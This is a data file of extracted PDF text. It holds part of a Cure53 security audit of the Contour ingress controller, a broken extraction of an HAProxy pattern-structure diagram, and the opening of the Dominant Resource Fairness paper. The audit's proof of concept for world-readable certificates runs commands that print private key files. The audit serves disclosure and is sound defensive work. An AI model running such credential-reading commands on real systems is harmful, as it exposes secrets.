since\ncommunication between both parties can be forced to plain-text. During the setup phase,\nhowever, Contour makes sure to generate all the necessary certificates for a TLS-\nencrypted connection between Contour and Envoy. It also has to be made sure that the\nEnvoy administrative interface is not accidentally bound to a network interface that\nlistens to something other than localhost. Contour’s again makes sure that, by default,\nonly kubectl’s port-forward command can be used to access the interface. Most of the\nother configurational settings that are of security concern are up to the users. They have\nto make sure that all routing conditions, prefix and header matches are correctly defined\nwithin the configuration files.\nAccess Control\nWhenever an application needs to perform a privileged action, it is crucial that an access\ncontrol model is in place to verify appropriate permissions. Furthermore, if the\napplication provides an external interface for interaction purposes, some form of\nseparation and access control may be required.\nContour’s deployment of Envoy suffered from an access control issue in the past in\nwhich the shutdown-manager could be invoked with a simple GET request to terminate\nEnvoy’s routing. This is described in more detail in CVE-2020-151271. The root cause of\nthis issue was that the shutdown-manager ’s endpoint was accessible to anyone that\ncould reach the Envoy’s Kubernetes node on the network.\nContour does not implement any sort of access control in the form of additional\nauthentication and there are no direct workarounds to prevent this issue in vulnerable\nversions. The only reliable method here is to upgrade to a fixed version where the\nshutdown endpoint cannot be reached via HTTP. Other sensitive endpoints that require\nlimited access are Envoy’s admin interface and Contour’s /debug/pprof service. For\n1 https://nvd.nist.gov/vuln/detail/CVE-2020-15127\nCure53, Berlin · 12/16/20 8/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nboth, it is made sure that they are only listening on localhost and require port forwarding\nvia kubectl to reach the appropriate endpoints. As Contour is mainly used as a load\nbalancer or reverse-proxy, the remaining ACL restrictions are mostly dependent on the\nnetwork config and specific usage scenario.\nLogging/Monitoring\nHaving a good logging/monitoring system in place allows developers and users to\nidentify potential issues more easily or get an idea of what might be going wrong. It can\nalso provide security-relevant information, for example when a verification of a signature\nfails. Consequently, having such a system in place has a positive influence on the\nproject.\nContour offers a pretty elegant way of debugging and some logging mechanisms. For\nexample, the contour serve command supports two command line flags that can either\nenable general debug logging of Contour, or verbose logging of interactions between\nContour and der Kubernetes API server. Similar options are present for Envoy as well,\nwhereas the envoy command allows to specify a log-level flag. An option that is\nspecifically interesting for proxy scenarios is traffic mirroring. With the mirror setting, one\ncan nominate selected services to receive copies of the received traffic to a different\nservice or port. This is especially useful for analyzing the same traffic by separate\ninstances.\nUnit/Regression and Fuzz-Testing\nWhile tests are essential for any project, their importance grows with the scale of the\nendeavor. Especially for large-scale compounds, testing ensures that functionality is not\nbroken by code changes. Furthermore, it generally facilitates the premise where features\nfunction the way they are supposed to. Regression tests also help guarantee that\npreviously disclosed vulnerabilities do not get reintroduced into the codebase. Testing is\ntherefore essential for the overall security of the project.\nContour integrates unit-tests for certain functionalities it offers. This mostly includes tests\nfor certificate and TLS secret generation, path and header matching conditions and so\nforth. All of these are scattered throughout the codebase in the various _test.go files and\nare self-contained for each package they are part of. This also includes simple\nregression tests for the previously reported DOS issue in the shutdownmanager .\nRecommended testing routines and software like gosec are used as an additional linter,\nthus leading to a positive impression made by this realm.\nCure53, Berlin · 12/16/20 9/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nDocumentation\nGood documentation contributes greatly to the overall state of the project. It can ease\nthe workflow and ensure final quality of the code. For example, having a coding\nguideline which is strictly enforced during the patch review process ensures that the\ncode is readable and can be easily understood by a spectrum of developers. Following\ngood conventions can also reduce the risk of introducing bugs and vulnerabilities to the\ncode.\nThe Contour project has an elaborate documentation2 which is well-organized and\nexplains features with sample configurations which can be easily reproduced. An\nadditional introduction page3 includes a few steps to get started with Contour. Commits\nmust follow a guideline in order to keep up consistency and maintainability. The team is\norganized in terms of who works on what, making sure that work is not duplicated.\nOrganization/Team/Infrastructure Specifics\nThis section will describe the areas Cure53 looked at to find out about the security\nqualities of the Contour project that cannot be linked to the code and software but rather\nencompass handling of incidents. As such, it tackles the level of preparedness for critical\nbug reports within the Contour development team. In addition, Cure53 also investigated\nthe degree of community involvement, i.e. through the use of bug bounty programs.\nWhile a good level of code quality is paramount for a good security posture, the\nprocesses and implementations around it can also make a difference in the final\nassessment of the security posture.\nSecurity Contact\nTo ensure a secure and responsible disclosure of security vulnerabilities, it is important\nto have a dedicated point of contact. This person/team should be known, meaning that\nall necessary information such as an email address and preferably also encryption keys\nof that contact should be communicated appropriately.\nThe project has a very detailed SECURITY.md which provides all necessary information\nto report a security issue including a contact address and elaborate instructions on how\nto create a report and what to include. It is explicitly stated that security related bug\nreports must not be filed on GitHub. In addition, the process behind patching and\ndisclosing issues is explained. However, the project could benefit from additionally\nprotecting the initial reports with PGP.\n2 https://projectcontour.io/docs/v1.10.0/3 https://projectcontour.io/getting-started/\nCure53, Berlin · 12/16/20 10/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nSecurity Fix Handling\nWhen fixing vulnerabilities in a public repository, it should not be obvious that a particular\ncommit addresses a security issue. Moreover, the commit message should not give a\ndetailed explanation of the issue. This would allow an attacker to construct an exploit\nbased on the patch and the provided commit message prior to the public disclosure of\nthe vulnerability. This means that there is a window of opportunity for attackers between\npublic disclosure and wide-spread patching or updating of vulnerable systems.\nAdditionally, as part of the public disclosure process, a system should be in place to\nnotify users about fixed vulnerabilities.\nAs there is only one publicly resolved security issue in Contour, there is no sample set to\njudge the handling of security fixes on. The issue in question is CVE-2020-15127, a\nDenial-of-Service vulnerability in the Envoy deployment. Alongside a release that fixes\nthe issue, a security advisory was published to describe the vulnerability and its impact.\nBesides the updates of the Envoy version, none of the commits or issues in the\nrepository indicate security issues.\nBug Bounty\nHaving a bug bounty program acts as a great incentive in rewarding researchers and\ngetting them interested in projects. Especially for large and complex projects that require\na lot of time to get familiar with the codebase, bug bounties work on the basis of the\npotential reward for efforts.\nThe Contour project does not have a bug bounty program at present, however this\nshould not be strictly viewed in a negative way. This is because bug bounty programs\nrequire additional resources and management, which are not always a given for all\nprojects. However, if resources become available, establishing a bug bounty program for\nContour should be considered. It is believed that such a program could provide a lot of\nvalue to the project.\nBug Tracking & Review Process\nA system for tracking bug reports or issues is essential for prioritizing and delegating\nwork. Additionally, having a review process ensures that no unintentional code, possibly\nmalicious code, is introduced into the codebase. This makes good tracking and review\ninto two core characteristics of a healthy codebase.\nNormal bugs with no impact on Contour's security can be filed as issues in the repository\non GitHub. The corresponding issue template includes everything that is needed to\ncreate an appropriate bug report. Users who want to contribute fixes or features should\nfollow the guidelines in the CONTRIBUTING.md readme stating that larger changes\nshould be discussed first before contributing any code. All contributions must conform to\nCure53, Berlin · 12/16/20 11/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \na certain set of rules and all tests have to run successfully. The existence of a review\nprocess is hinted in a document about the work on the Contour project4.\nEvaluating the Overall Posture\nChoosing Go has been a great decision and automatically reduces the potential for\nintroducing memory-safety-related issues. Additionally, the excellent documentation\nalong with the established processes for patches and contributions further reduce the\nrisk of security vulnerabilities. A topic worth mentioning is that of a bug bounty program\nsince these require good funding and it is understandable that smaller projects are likely\nunable to secure these. However, with future growth of the project and potentially\nincreased resources, a bug bounty scheme should definitely be considered.\nPhase 2: Manual code auditing & pentesting\nThis section comments on the code auditing coverage within areas of special interest\nand documents the steps undertaken during the second phase of the audit against the\nContour software complex.\n•The contour command line interface code has been audited and only one minor\nissue was spotted, i.e. CON-01-004. It has to be noted that the referred\ncommand line options of the Contour binary are not used during a standard setup\naccording to the client.\n•The code was analyzed for any security critical debug code in production parts\nwithout any results.\n•The build system of Contour and its Makefile has been analyzed with regards to\nsecurity related hardening and compiler flags. One additional recommendation\nhas been raised in CON-01-001.\n•The connection between Contour and Envoy is using gRPC. The code was\naudited for security-related settings of the gRPC layer and only one minor\nimprovement has been proposed in relation to a missing return value check, see\nCON-01-002. Besides that, no security issues have been identified.\n•HTTP header rewriting and prefix rewriting have been analyzed and audited with\nparticular care, though no issues have been spotted.\n•The configuration of Contour and its parsing-related code has been analyzed and\nno issues have been spotted. It has to be noted that Contour puts a lot of trust\ninto the operator using Contour and the application logic sometimes leaves\nvalues read from input files unrestricted to a meaningful range.\n•The shutdownmanager has been audited for logic bugs, and only one minor\nimprovement was spotted related to re-transmission in case HTTP requests\ntowards Envoy are failing, see CON-01-003.\n4 https://projectcontour.io/resources/how-we-work/\nCure53, Berlin · 12/16/20 12/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n•Contour uses a DAG to store Ingresses, HTTP proxies and HTTP listeners. The\nrelated code has been analyzed and no issues have been spotted.\n•Cryptographic primitives used within Contour have been checked and no issues\nhave been identified.\n•The contour-authserver source code repository has only been used as a\nreference implementation and was not reviewed in-depth.\n•Generally speaking, the manual code audit has confirmed that the entire\ncodebase is very clean and in good shape. \nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in chronological order rather than by their\ndegree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. CON-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nCON-01-004 WP1: contour certgen stores private keys as world-accessible (Low)\nDuring an audit of the Contour application, it was noticed that the certgen command for\ngenerating new TLS certificates, used for bootstrapping gRPC over TLS, offers an option\nnamed pem, allowing to store the generated key material including public/private key\npairs for Contour and Envoy, with file permissions 0666. Moreover, the certgen\ncommand provides an additional option to persist the generated public/private key pairs\nas Kubernetes secrets in YAML form, also with file permissions 0666.\nThis insecure default file permissions grants read and write permissions to anyone. It is\nimportant to note that the configured umask5 of the Linux system, where the Contour\nbinary is invoked, gets applied when creating the referred private key files.\nIf a malicious entity is capable of obtaining the public/private key pair of Contour and/or\nEnvoy, they can potentially eavesdrop communication between Contour and Envoy or\nimpersonate one or the other on behalf of each component. This is because the\npublic/private key pair is used to perform mutual client authentication.\nAffected Files:\n•contour/cmd/contour/certgen.go\n•contour/internal/certgen/certgen.go\n•contour/internal/certgen/output.go\n5 https://man7.org/linux/man-pages/man2/umask.2.html\nCure53, Berlin · 12/16/20 13/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nAffected Code:\ncontour/cmd/contour/certgen.go:\nfunc OutputCerts(config *certgenConfig, kubeclient *kubernetes.Clientset, certs \nmap[string][]byte) error {\n[...]\nif config.OutputPEM {\n[...]\nif err := certgen.WriteCertsPEM (config.OutputDir, certs, \nforce); [...]\nif config.OutputYAML {\n[...]\nif err := certgen.WriteSecretsYAML (\nconfig.OutputDir, secrets, force);\n[...]\n}\ncontour/internal/certgen/certgen.go:\nfunc WriteCertsPEM(outputDir string, certdata map[string][]byte, force \nOverwritePolicy) error {\n[...]\nerr = writePEM(outputDir, \"contourkey.pem\", \ncertdata[ContourPrivateKeyKey], force)\nif err != nil {\nreturn err\n}\n[...]\nreturn writePEM(outputDir, \"envoykey.pem\", \ncertdata[EnvoyPrivateKeyKey], force)\n}\nfunc writePEM(outputDir, filename string, data []byte, force OverwritePolicy) \nerror {\nfilepath := path.Join(outputDir, filename)\nf, err := createFile(filepath, force == Overwrite)\nif err != nil {\nreturn err\n}\n_, err = f.Write(data)\nreturn checkFile(filepath, err)\n}\nfunc WriteSecretsYAML(outputDir string, secrets []*corev1.Secret, force \nOverwritePolicy) error {\nfor _, s := range secrets {\nCure53, Berlin · 12/16/20 14/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nfilename := path.Join(outputDir, s.Name+\".yaml\")\nf, err := createFile(filename, force == Overwrite)\n[...]\nif err := checkFile(filename, writeSecret(f, s) ); err != nil\n{\nreturn err\n}\n[...]\n}\ncontour/internal/certgen/output.go:\nfunc createFile(filepath string, force bool) (*os.File, error) {\nerr := os.MkdirAll(path.Dir(filepath), 0755)\n[...]\nflags := os.O_RDWR | os.O_CREATE | os.O_TRUNC\n[...]\nf, err := os.OpenFile(filepath, flags, 0666)\n[...]\nreturn f, nil\n}\nPoC:\nAs already indicated, the configured umask of the running Linux system is applied when\nrunning the contour command, resulting in different file permissions than 0666.\nNevertheless, the default umask on standard Linux systems is usually set to 002 or 022,\nwhich will still allow read access to the generated private key files.\n$ ./contour certgen --pem\nWriting certificates to PEM files in certs/\ncerts/cacert.pem created\ncerts/contourcert.pem created\ncerts/contourkey.pem created\ncerts/envoycert.pem created\ncerts/envoykey.pem created\n$ ls -la certs\ntotal 28\ndrwxr-xr-x 2 user user 4096 Nov 19 09:18 .\ndrwxrwxr-x 16 user user 4096 Nov 19 09:18 ..\n-rw-rw-r-- 1 user user 1139 Nov 19 09:18 cacert.pem\n-rw-rw-r-- 1 user user 1281 Nov 19 09:18 contourcert.pem\n-rw-rw-r-- 1 user user 1679 Nov 19 09:18 contourkey.pem\n-rw-rw-r-- 1 user user 1265 Nov 19 09:18 envoycert.pem\n-rw-rw-r-- 1 user user 1675 Nov 19 09:18 envoykey.pem\n$ cat certs/envoykey.pem\nCure53, Berlin · 12/16/20 15/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n-----BEGIN RSA PRIVATE KEY-----\n[...]\n-----END RSA PRIVATE KEY-----\n$ cat certs/contourkey.pem\n-----BEGIN RSA PRIVATE KEY-----\n[...]\n-----END RSA PRIVATE KEY-----\n$ ./contour certgen --yaml\nWriting \"legacy\" format Secrets to YAML files in certs/\ncerts/contourcert.yaml created\ncerts/envoycert.yaml created\ncerts/cacert.yaml created\n$ ls -la certs\ntotal 28\ndrwxr-xr-x 2 user user 4096 Nov 19 09:41 .\ndrwxrwxr-x 16 user user 4096 Nov 19 09:41 ..\n-rw-rw-r-- 1 user user 1688 Nov 19 09:41 cacert.yaml\n-rw-rw-r-- 1 user user 4137 Nov 19 09:41 contourcert.yaml\n-rw-rw-r-- 1 user user 4115 Nov 19 09:41 envoycert.yaml\n$ cat certs/contourcert.yaml\napiVersion: v1\ndata:\n tls.crt: [...]\n tls.key: [...]\nkind: Secret\n[...]\n$ cat certs/envoycert.yaml\napiVersion: v1\ndata:\n tls.crt: [...]\n tls.key: [...]\nkind: Secret\n[...]\nCure53 wants to point out that private key files should never be stored with file\npermissions 0666. 0600 should be used instead, only granting read and write\npermissions to the owner of the file.\nCure53, Berlin · 12/16/20 16/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible\nCON-01-001 WP2: Build system lacks PIE and RELRO executable flags (Low)\nWhile checking the properties of the compiled Contour binary, it has been identified that\nthe resulting binary does not have the compiler time security hardening flags enabled.\nThe following security hardening options are missing:\n•PIE\n•RELRO\nA detailed description of the referred security hardening compiler flags can be found\nonline6.\nPoC:\nThe following PoC has been run on a Ubuntu 20.04 Virtual Machine.\n$ sudo apt-get install golang\n$ git clone https://github.com/projectcontour/contour.git\n$ git clone https://github.com/slimm609/checksec.sh.git\n$ cd contour\n$ make build\n$ cd ../checksec.sh\n$ $./checksec --file=contour/contour --output=json\n{ \"contour/contour\": \n{ \"relro\":\"no\",\"canary\":\"yes\",\"nx\":\"yes\",\" pie\":\"no\",\"rpath\":\"no\",\"runpath\":\"no\",\n\"symbols\":\"no\",\"fortify_source\":\"yes\",\"fortified\":\"2\",\"fortify-able\":\"2\" } }\nChanging the build target within the Contour Makefile as follows results in a binary\nhaving the referred compiler time options set:\n[...]\ngo build -buildmode=pie -mod=readonly -v -ldflags=\"$(GO_LDFLAGS)\" $(GO_TAGS) $\n(MODULE)/cmd/contour\n[...]\nAfter applying the above change and recompiling the Contour binary, it is evident that\nRELRO and PIE are now enabled, as shown below:\n6 https://wiki.archlinux.org/index.php/Arch_package_guidelines/Security#Golang\nCure53, Berlin · 12/16/20 17/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n$ $./checksec --file=contour/contour --output=json\n{ \"contour\": \n{ \"relro\":\"full\",\"canary\":\"yes\",\"nx\":\"yes\",\" pie\":\"yes\",\"rpath\":\"no\",\"runpath\":\"n\no\",\"symbols\":\"no\",\"fortify_source\":\"yes\",\"fortified\":\"2\",\"fortify-able\":\"2\" } }\nCure53 encourages the use of all existing compiler security features in order to raise the\nbar for attackers who aim to exploit vulnerabilities within Contour.\nCON-01-002 WP1: Improper error handling in grpcOptions function (Info)\nNote: This issue was a identified as a false alert after reporting and can thus be\nconsidered obsolete.\nDuring an audit of the gRPC-related code of Contour, it was noticed that the function\ngrpcOptions, responsible for building the gRPC options object, is not properly checking\nthe return value when creating the tlsconfig object. When there is an error while creating\nthe tlsconfig object, e.g. when it attempts to read a non-existing caFile, the function\ntlsconfig returns a TLS config having the function pointer GetConfigForClient to always\nreturn nil. Per the official documentation of the TLS Golang package7, the function\nGetConfigForClient is called after a ClientHello message is received from a client during\nthe TLS handshake, and if the returned configuration is nil, no client-specific TLS\nconfiguration is used.\nAffected Files:\ncontour/cmd/contour/servecontext.go\nAffected Code:\nfunc (ctx *serveContext) grpcOptions(log logrus.FieldLogger) []grpc.ServerOption\n{\n[...]\nif !ctx.PermitInsecureGRPC {\ntlsconfig := ctx.tlsconfig(log)\ncreds := credentials.NewTLS(tlsconfig)\nopts = append(opts, grpc.Creds(creds) )\n}\nreturn opts\n}\nfunc (ctx *serveContext) tlsconfig(log logrus.FieldLogger) *tls.Config {\n[...]\nloadConfig := func() (*tls.Config, error) {\ncert, err := tls.LoadX509KeyPair(ctx.contourCert, \nctx.contourKey)\nif err != nil {\n7 https://golang.org/pkg/crypto/tls/\nCure53, Berlin · 12/16/20 18/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nreturn nil, err\n}\nca, err := ioutil.ReadFile(ctx.caFile)\nif err != nil {\nreturn nil, err\n}\ncertPool := x509.NewCertPool()\nif ok := certPool.AppendCertsFromPEM(ca); !ok {\nreturn nil, fmt.Errorf ([...])\n}\n[...]\n}\n[...]\n// Attempt to load certificates and key to catch configuration \nerrors early.\nif _, lerr := loadConfig(); lerr != nil {\nlog.WithError(err).Fatal(\"failed to load certificate and \nkey\")\n}\nreturn &tls.Config{\nClientAuth: tls.RequireAndVerifyClientCert,\nRand: rand.Reader,\nGetConfigForClient : func(*tls.ClientHelloInfo) (*tls.Config,\nerror) {\nreturn loadConfig()\n},\n}\n}\nAlthough the described issue does not have an immediate security impact, it is important\nand considered good practice to properly check the return value of function invocations\nin order to address and act on error conditions.\nCON-01-003 WP1: shutdown-manager Envoy health check lacks retry logic (Info)\nDuring a code review of the shutdownHandler inside Contour it was noticed that the\ncode is lacking a proper retry logic in case the HTTP POST request, used for draining\nthe connection pool of Envoy upon shutdown, is missing. Any communication over the\nnetwork can potentially fail due to various reasons, it is therefore good practice to\nimplement a retry mechanism to handle such situations.\nAffected Files:\ncontour/cmd/contour/shutdownmanager.go\nCure53, Berlin · 12/16/20 19/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nAffected Code:\nshutdownmanager.go:\nfunc (s *shutdownContext) shutdownHandler() {\ns.WithField(\"context\", \"shutdownHandler\").Infof(\n\"waiting %s before draining connections\", s.drainDelay)\ntime.Sleep(s.drainDelay)\n// Send shutdown signal to Envoy to start draining connections\ns.Infof(\"failing envoy healthchecks\")\nif err := shutdownEnvoy(); err != nil {\ns.WithField(\"context\", \"shutdownHandler\").Errorf(\n\"error sending envoy healthcheck fail: %v\", err)\n}\n[...]\n}\nfunc shutdownEnvoy() error {\nresp, err := http.Post(healthcheckFailURL, \"\", nil)\nif err != nil {\nreturn fmt.Errorf(\n\"creating healthcheck fail POST request failed: %s\", err)\n}\ndefer resp.Body.Close()\nif resp.StatusCode != http.StatusOK {\nreturn fmt.Errorf(\"POST for %q returned HTTP status %s\", \nhealthcheckFailURL, resp.Status)\n}\nreturn nil\n}\nCure53 recommends adding a retry handler for the POST request to Envoy in case the\nHTTP request fails. This helps to eliminate the situation where Kubernetes forcefully\nterminates the Pod after the grace period has elapsed.\nCON-01-005 WP1: Support of weak cipher-suites (Info)\nIt was found that the supported list of ciphers, set during the configuration of the\ndownstream TLS context of Contour, supports SHA-1 for data integrity. Given the fact\nthat other, more robust cipher-suites are supported as well, this considerably reduces\nthe severity of this issue.\nAffected File:\ncontour/internal/envoy/auth.go\nCure53, Berlin · 12/16/20 20/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nAffected Code:\nCiphers = []string{\n\"[ECDHE-ECDSA-AES128-GCM-SHA256|ECDHE-ECDSA-CHACHA20-POLY1305]\",\n\"[ECDHE-RSA-AES128-GCM-SHA256|ECDHE-RSA-CHACHA20-POLY1305]\",\n\"ECDHE-ECDSA-AES128-SHA\" ,\n\"ECDHE-RSA-AES128-SHA\",\n//\"AES128-GCM-SHA256\",\n//\"AES128-SHA\",\n\"ECDHE-ECDSA-AES256-GCM-SHA384\",\n\"ECDHE-RSA-AES256-GCM-SHA384\",\n\"ECDHE-ECDSA-AES256-SHA\" ,\n\"ECDHE-RSA-AES256-SHA\" ,\n//\"AES256-GCM-SHA384\",\n//\"AES256-SHA\",\n}\nSHA-1 has been proven to be vulnerable to collision attacks as of 20178. Although this\ndoes not affect its usage as a MAC, safer alternatives such as SHA-256 or SHA-3 are\nrecommended.\n8 https://shattered.io/\nCure53, Berlin · 12/16/20 21/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nConclusions\nAs already noted in the Introduction, the Contour project has clearly emerged victorious\nfrom this Cure53 late 2020 assessment. This concerns many fronts, but should\nespecially be underscored with regard to the commendable overall security standing of\nthe project, including the project structure, documentation, coding style and development\nteam’s capacities and involvement. After dedicating twenty days to comprehensive\nassessments of the items in scope, Cure53 can confirm that this is one of the most\nmature and well-structured projects the Cure53 team has encountered in the frames of\nthe long-lasting cooperation with CNCF.\nBesides the general praise, Cure53 would like to state that installation of several\ndeployment options on a Kubernetes cluster proved to be exemplary, though adapting\nsome of the configuration options was more challenging than expected. In addition,\ncommunication with the development team has been very productive and without any\ndelays. Response times have been excellent. The codebase is clean and wisely relies\non Go, within which no impactful security issues could be spotted. The fact that there\nwere only five issues documented, all of them Low or Info, further contributed to the\noverwhelmingly positive results obtained here.\nMoving to some details about the infrastructure, the analysis demonstrated that Contour\nis well-organized. The focus has been placed not only on the code itself, but also on the\naspects around it. This includes handling of security issues, bug reports and user-\ncontributions which are all described in the appropriate readme files. It is clear that a lot\nof thought was put into organization and developing processes as no big issues were\nfound in this area. Although reported security flaws are mostly very short-lived, it would\nbe beneficial to add a PGP key to the corresponding email address.\nAs for the code and implementation, the code’s logic needs to be reiterated as written in\na clear and easy to follow manner. As already indicated, the choice of using Go as a\nprogramming language has significant benefits in terms of security, especially over\nlanguages such as C or C++ which are typically prone to memory corruption\nvulnerabilities. It is remarkable that the same coding style has been applied over all very\ndifferent source files.\nTo conclude, from a security perspective, the analysis of Contour has not revealed\nanything but minor issues having neither direct nor severe security impact. These flaws\nshould merely be considered as additional recommendations that further enhance the\nalready very robust security posture. The Contour project can already be considered as\nmature and may only be judged as production-ready. The development team has to be\ncommended for their overall diligence and clearly observable enthusiasm for this project.\nCure53, Berlin · 12/16/20 22/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIt is hoped that the development continues along the established path and maintains the\nexceptional quality standards set and observed to date.\nCure53 would like to thank Michael Michael, Steve Sloka, Nick Young and James Peach\nfrom the Contour team as well as Chris Aniszczyk of The Linux Foundation for their\nexcellent project coordination, support and assistance, both before and during this\nassignment. Special gratitude also needs to be extended to The Linux Foundation for\nsponsoring this project.\nCure53, Berlin · 12/16/20 23/23" } ]
{ "category": "Orchestration & Management", "file_name": "pattern.pdf", "project_name": "HAProxy", "subcategory": "Service Proxy" }
[ { "data": "struct pat_ref\nThis struct contain t he pattern\nreferences. These ar e the string\nrepresentation of th e original pattern\ninput. This is used fo r for changing\nentries.\n struct list list\nUsed to chain struct pat_ref\n unsigned int fla gs\nFree flags. Actually, it is used to\nndicate the usage of this reference. It\ncan be PAT_REF_MA P and/or PAT_REF_AC L\n char *reference\nThe reference name .\n struct list pat\nThe head of the list of all struct\npattern_expr that us es this list.\n struct list head\nThe head of the list of all entries of\nthe reference. struct pat_ref_elt\nThis contain the bas ic data for one\npattern entry.\n struct list list\nUsed to chain\n char *pattern\nPattern as string form\n char *sample\nValue as string form\n int line\nThe original line num ber.struct pattern_hea d\nThis struct constain a list of pattern\nexpressions that can apply on ACL or\nMAP.\n parse\nThe function used fo r parsing pattern\n parse_smp\nThe function used fo r parsing the\nassociated sample\n index\nThe function used fo r indexing the\npattern\n delete\nThe function used fo r deleting one\npattern\n looksmp\nThis function return the sample with\nlooking for the patte rn\n prune\nThis function clean p attern_expr\n match\nThis function check if value match the\npattern\n struct list head\nThis contain the hea d of the list of\nall pattern_exprstruct pattern_exp r\nThis struct contain h e data relative to\none pattern.\n struct pattern_h ead *pat_head\nthe pattern_head ref erence\n struct pat_ref * ref\nThe reference\n struct list list\nUsed to chian in stru ct pat_ref\n struct list patt erns\nFree use for indexing patterns\n struct eb_root p attern_tree\nFree use for indexing patterns\n struct eb_root p attern_tree_2\nFree use for indexing patternsACL\nMAP\nStatic list of\nreferencestruct pattern_exp r_list\nThis struct is just use d for\nestablishing the list of pattern that\ndepends of a pattern _head struct.\n struct list list\nUsed to chian in stru ct pat_ref\n int do_free\nThe pointer expr mu st be freed\n struct pattern_e xpr *expr\nFree use for indexing patternsWARNING: (struct pa ttern_head *)foo->h ead->(struct pattter n_expr_list)->expr-> pat_head CAN BE != foo.\nstruct pattern_tre e\nThis struct is elemen t of a tree\n struct ebmb_node node\nUsed to chian in stru ct pat_ref\n struct sample_st orage\ncontain the sample\n struct pat_ref_e lt *elt\nReference to origina l pattern sourcestruct pattern_list\nThis struct is elemen t of a list\n struct list list\nUsed to chian in stru ct pat_ref\n struct pattern p attern\nReference to origina l pattern source\nstruct pattern\nThis struct contain t he values of the\npattern matching\n [...]\nThe vars and attribu tes forming the\npattern\n struct sample_st orage\ncontain the sample\n struct pat_ref_e lt *elt\nReference to origina l pattern sourceCreate static patte rn\nbased to the tree dataList\nList\nListListList\nTree" } ]
{ "category": "Orchestration & Management", "file_name": "nsdi_drf.pdf", "project_name": "Apache Mesos", "subcategory": "Scheduling & Orchestration" }
[ { "data": "Dominant Resource Fairness: Fair Allocation of Multiple Resource Types\nAli Ghodsi, Matei Zaharia, Benjamin Hindman, Andy Konwinski, Scott Shenker, Ion Stoica\nUniversity of California, Berkeley\nfalig,matei,benh,andyk,shenker,istoica g@cs.berkeley.edu\nAbstract\nWe consider the problem of fair resource allocation\nin a system containing different resource types, where\neach user may have different demands for each resource.\nTo address this problem, we propose Dominant Resource\nFairness (DRF) , a generalization of max-min fairness\nto multiple resource types. We show that DRF, unlike\nother possible policies, satisfies several highly desirable\nproperties. First, DRF incentivizes users to share re-\nsources, by ensuring that no user is better off if resources\nare equally partitioned among them. Second, DRF is\nstrategy-proof, as a user cannot increase her allocation\nby lying about her requirements. Third, DRF is envy-\nfree, as no user would want to trade her allocation with\nthat of another user. Finally, DRF allocations are Pareto\nefficient, as it is not possible to improve the allocation of\na user without decreasing the allocation of another user.\nWe have implemented DRF in the Mesos cluster resource\nmanager, and show that it leads to better throughput and\nfairness than the slot-based fair sharing schemes in cur-\nrent cluster schedulers.\n1 Introduction\nResource allocation is a key building block of any shared\ncomputer system. One of the most popular allocation\npolicies proposed so far has been max-min fairness ,\nwhich maximizes the minimum allocation received by a\nuser in the system. Assuming each user has enough de-\nmand, this policy gives each user an equal share of the\nresources. Max-min fairness has been generalized to in-\nclude the concept of weight, where each user receives a\nshare of the resources proportional to its weight.\nThe attractiveness of weighted max-min fairness\nstems from its generality and its ability to provide perfor-\nmance isolation. The weighted max-min fairness model\ncan support a variety of other resource allocation poli-\ncies, including priority, reservation, and deadline based\nallocation [31]. In addition, weighted max-min fairness\nensures isolation, in that a user is guaranteed to receiveher share irrespective of the demand of the other users.\nGiven these features, it should come as no surprise\nthat a large number of algorithms have been proposed\nto implement (weighted) max-min fairness with various\ndegrees of accuracy, such as round-robin, proportional\nresource sharing [32], and weighted fair queueing [12].\nThese algorithms have been applied to a variety of re-\nsources, including link bandwidth [8, 12, 15, 24, 27, 29],\nCPU [11, 28, 31], memory [4, 31], and storage [5].\nDespite the vast amount of work on fair allocation, the\nfocus has so far been primarily on a single resource type.\nEven in multi-resource environments, where users have\nheterogeneous resource demands, allocation is typically\ndone using a single resource abstraction. For example,\nfair schedulers for Hadoop and Dryad [1, 18, 34], two\nwidely used cluster computing frameworks, allocate re-\nsources at the level of fixed-size partitions of the nodes,\ncalled slots. This is despite the fact that different jobs\nin these clusters can have widely different demands for\nCPU, memory, and I/O resources.\nIn this paper, we address the problem of fair alloca-\ntion of multiple types of resources to users with heteroge-\nneous demands. In particular, we propose Dominant Re-\nsource Fairness (DRF), a generalization of max-min fair-\nness for 